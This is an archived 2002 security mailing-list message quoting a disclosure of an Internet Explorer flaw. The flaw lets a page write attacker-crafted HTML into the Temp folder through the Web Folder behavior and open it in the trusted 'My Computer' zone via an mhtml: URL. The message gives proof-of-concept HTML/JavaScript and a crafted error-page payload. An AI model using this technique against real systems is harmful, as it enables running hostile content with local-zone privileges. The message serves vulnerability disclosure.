It works on windows 2000 SP3 with IE6 with all the patches. At least for me. -- Bob Sullivan Art Line Inc. rsullivan@art-line.com -----Original Message----- From: http-equivat_private [mailto:http-equivat_private] Sent: Wednesday, August 14, 2002 7:34 PM To: bugtraqat_private; NTBugtraqat_private Cc: focus-msat_private; vuln-devat_private Subject: SILLY BEHAVIOR : Internet Explorer 5.5 - 6.0 Wednesday, August 14, 2002 The following represents a trivial yet elaborate method of injecting arbitrary html into the "My Computer" zone on win98 using the Internet Explorer series of browsers. Internet Explorer enjoys a unique component called the "Web Folder" component. This is a selectable component install with the original installation of the browser or can be added later on. This unique component allows for an assortment of web publishing and authoring conveniences, often touted as useful "feature". But what it actually does, is create a nicely named file for us in a known location. Where: The Internet Explorer series 5 through 6 enjoy a related behavior to the so-called "Web Folder" component which allows us to point directly to one of these web folders and traverse it directly. However, should the folder not exist, an error message is generated and conveniently placed for us in the temp folder: So: This particular error message is nothing more than a server side 404 error message which can be modified to suit our needs as we require. Commence: We first construct our trivial behavior to generate the error message like so: <body onload=malware() style="behavior: url(#default#httpFolder);"> <script> function malware(){ document.body.navigate("http://www.microsoft.com");alert ("malware");open("file://C%3A%5CWINDOWS%5CTemp%5Cwecerr.txt") } </script>> What this will do is "probe" the target site for a webfolder, and if not found, create our error file in the temp folder as follows: [screen shot: http://www.malware.com/behave.png 4KB] Because the error fie is nothing more than a text file, we need to include our own html and allow Internet Explorer to 'read' it. Previously numerous possibilities to allow for this existed, including <object data="" type="text/html>, databinding with dataformatas="HTML", dotting file extensions etc. These now all appear to be patched. Good: But because we can craft our own error message on the server and point our trivial behavior to it, we simply construct our error message like so: MIME-Version: 1.0 Content-Type: text/html; charset="Windows-1252" Content-Transfer-Encoding: 7bit <br><br> <body bgcolor=black> <center><font size="24" color="red" face="arial">malware</font></center> What that will do is generate our simple text file in our temp folder, and by merely mhtml'izing our url like so: open ("mhtml:file://C%3A%5CWINDOWS%5CTemp%5Cwecerr.txt"), Internet Explorer will open our text file in full html splendor. Inclusive of whatever other "objects" we so desire. [screen shot: http://www.malware.com/your.png 8KB] Working Example: note: windows98 with temp folder default. note: requires the 'web component' note: simple text file only for demo purposes http://www.malware.com/behave.html [screen shot: http://www.malware.com/self.png 12KB] Notes: 1. None. End Call -- http://www.malware.com *yawn*
This archive was generated by hypermail 2b30 : Thu Aug 15 2002 - 15:13:42 PDT
